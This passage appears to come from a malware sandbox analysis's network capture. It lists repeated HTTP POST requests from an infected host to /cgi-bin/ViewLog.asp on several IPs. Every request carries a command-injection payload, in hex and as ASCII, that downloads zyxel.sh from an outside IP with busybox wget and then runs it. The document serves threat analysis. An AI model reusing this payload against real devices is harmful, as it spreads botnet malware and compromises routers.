                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.242702007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.583054066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:14.728435040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            732192.168.2.234559231.136.19.148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.066765070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.069149017 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.212233067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.242702007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.583054066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:14.728435040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            733192.168.2.234710631.136.7.1898080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.067038059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.069089890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.212256908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:00.242682934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:25.582977057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:14.728364944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            734192.168.2.235205062.221.81.2438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.073287010 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.308321953 CET224INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 106
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            735192.168.2.234434894.121.221.1258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.085668087 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            736192.168.2.233892431.136.167.1648080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.243405104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.861385107 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.109213114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:43.604938984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.724406958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:58.706741095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.439950943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.394254923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            737192.168.2.234497231.136.177.2078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.243592978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:39.861381054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:41.109215975 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:43.604923964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.724330902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:58.706748962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.439989090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
